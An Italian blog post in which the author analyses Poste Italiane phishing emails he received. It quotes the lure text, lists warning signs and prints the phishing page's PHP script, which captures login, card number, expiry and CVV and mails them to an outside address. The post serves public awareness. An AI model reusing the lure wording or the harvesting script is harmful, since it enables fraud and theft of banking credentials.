
Quando si parla Phishing la maggior parte delle persone pensa che si stà parlando di bisogni fisiologici oppure i più malizioni pensano subito al mondo dell’erotismo. Il Phishing, è una tecnica di ingegneria sociale, punta a carpire le informazioni riservate di una persona. L’aspetto più tragico delle tecniche di ingnegneria sociale (dato che l’obbietivo sono le informazioni e quindi beni immateriali) è che la vittima difficilmente si accorgerà dell’attacco, a parte quei casi in cui le informazioni sono utilizzate per sottrare beni materiali. Per chi non ne sa niente e volesse approfondire può consultare: Phishing, Ingegneria Sociale.
Ho deciso di parlare di questa tecnica perché stamattina ho subito un tentativo di phishing. Mi è arrivata una mail da Poste Italiane chiedendomi di reinserire i dati del mio conto pena un mancato servizio, logicamente è un tentativo di frode, un modo subdolo per riuscire a carpire i miei dati per rubarmi i miei 20 euri che ho sul conto, cattivone… Ora ti aggiusto io…
Stamattina come al solito vado a controllare la posta. Tra le mail che mi sono arrivate c’erano tre da parte di Poste Italiane. Mi domando “Cosa sarà mai successo. Un cataclisma che incombe su tutto l’universo.”. Poi il contenuto mi ha veramente stupito.
Il contenuto della prima
Il phishing и una frode informatica, realizzata con l’invio di e-mail contraffatte, inalizzata all’acquisizione, per scopi illegali, di dati riservati.
Gentile Cliente,
nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.L’inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione.
Per ovviare al problema e necessaria la verifica e l’aggiornamento dei dati relativi all’anaagrafica dell’Intestatario dei servizi Postali. Effetuare l’aggiornamento dei dati cliccando sul seguente collegamento sicuro:
https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp
Cordiali Saluti.
Il contenuto della seconda
Oggetto: Comunicazione nr. 91219 del 26 Aprile 2007 – Leggere con attenzione
Gentile Cliente,
Nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.L’inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione.
Per ovviare al problema e necessaria la verifica e l’aggiornamento dei dati relativi all’anaagrafica dell’Intestatario dei servizi Postali. Effetuare l’aggiornamento dei dati cliccando sul seguente collegamento sicuro:
https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp
Cordiali Saluti.
A parte che il mio programma di posta (Thunderbird) mi segnalava la possibilità che fosse una frode c’erano molti motivi per capire subito che si trattava di una frode:
- Non vengono mai inviate mail che chiedono di reinserire dati a causa di un errore.
- L’indirizzo della pagina a cui si arriva schiacciando sul collegamento indicato porta ad una pagina che è identica a poste.it (una copia perfetta) ad esclusione dell’indirizzo.
- Non è un collegamento sicuro (https://) ma solo un collegamento normale (http://)
- Disgrazie grammaticali.

session_start(); $USER = $_SESSION['USER']; $PASS = $_SESSION['PASS']; $CC = $_POST['CC']; $MONTH = $_POST['EM']; $YEAR = $_POST['EY']; $CVV = $_POST['CVV2']; $ip = getenv(“REMOTE_ADDR”); $adddate=date(“D M d, Y g:i a”); $subj = “$USER : $PASS __ $CC $MONTH/$YEAR $CVV “; $msg = ” Poste IT User : $USER Pass : $PASS Card Number : $CC Expiration Date ( mm/yy ) : $MONTH/$YEAR CVV2 : $CVV “; mail(” email@domain.comemail@domain.com “, $subj, $msg); header(“Location: complete.html”);
La cosa interessante è che i dati delle persone truffate vengono inviate alla casella: ” email@domain.comemail@domain.com “. Come prima cosa vado a vedere l’indirizzo http://www.domain.com, sembra il sito di un maintener (società che forniscono dei servizi ai webmaster: registrazione domini, hosting, using, server virtuali, ecc). Interrogo dinuovo il database e:
% This is the RIPE Whois query server #1. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/db/copyright.html
%ERROR:101: no entries found % % No entries found in the selected source(s).
Nessuna informazione in merito. Purtroppo sono costretto a fermarmi qui. Da qui in avanti solo la Polizia Postale ha l’autorità giuridica a procedere. Una piccola osservazione. Meno male che utilizzo Mozilla Firefox e Thunderbird altrimenti potevo cadere nell’inganno. State attenti alle facciate a volte nascondono qualcosa di brutto…